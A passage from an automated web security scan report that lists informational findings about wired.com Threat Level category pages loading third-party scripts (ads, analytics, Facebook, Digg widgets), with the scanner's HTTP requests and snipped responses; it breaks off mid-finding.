http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=199
Expires: Wed, 12 Jan 2011 15:34:36 GMT
Date: Wed, 12 Jan 2011 15:31:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.158. http://www.wired.com/threatlevel/category/rfid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rfid/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/rfid/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=103
Expires: Wed, 12 Jan 2011 15:32:59 GMT
Date: Wed, 12 Jan 2011 15:31:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.159. http://www.wired.com/threatlevel/category/riaa-litigation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/riaa-litigation/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/riaa-litigation/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=126
Expires: Wed, 12 Jan 2011 15:33:26 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.160. http://www.wired.com/threatlevel/category/rsa-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rsa-conference/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/rsa-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=138
Expires: Wed, 12 Jan 2011 15:33:38 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.161. http://www.wired.com/threatlevel/category/sexting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sexting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/sexting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=121
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.162. http://www.wired.com/threatlevel/category/spooks-gone-wild/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/spooks-gone-wild/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/spooks-gone-wild/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:40 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=99
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:31:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.163. http://www.wired.com/threatlevel/category/stuxnet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/stuxnet/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/stuxnet/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=166
Expires: Wed, 12 Jan 2011 15:34:24 GMT
Date: Wed, 12 Jan 2011 15:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.164. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sunshine-and-secrecy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/sunshine-and-secrecy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=93
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.165. http://www.wired.com/threatlevel/category/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/surveillance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/surveillance/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=123
Expires: Wed, 12 Jan 2011 15:33:51 GMT
Date: Wed, 12 Jan 2011 15:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.166. http://www.wired.com/threatlevel/category/the-courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-courts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/the-courts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=113
Expires: Wed, 12 Jan 2011 15:33:42 GMT
Date: Wed, 12 Jan 2011 15:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.167. http://www.wired.com/threatlevel/category/the-ridiculous/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-ridiculous/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/the-ridiculous/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=142
Expires: Wed, 12 Jan 2011 15:34:14 GMT
Date: Wed, 12 Jan 2011 15:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.168. http://www.wired.com/threatlevel/category/threats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/threats/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/threats/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=145
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:32:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.169. http://www.wired.com/threatlevel/category/three-strikes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/three-strikes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/three-strikes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=87
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
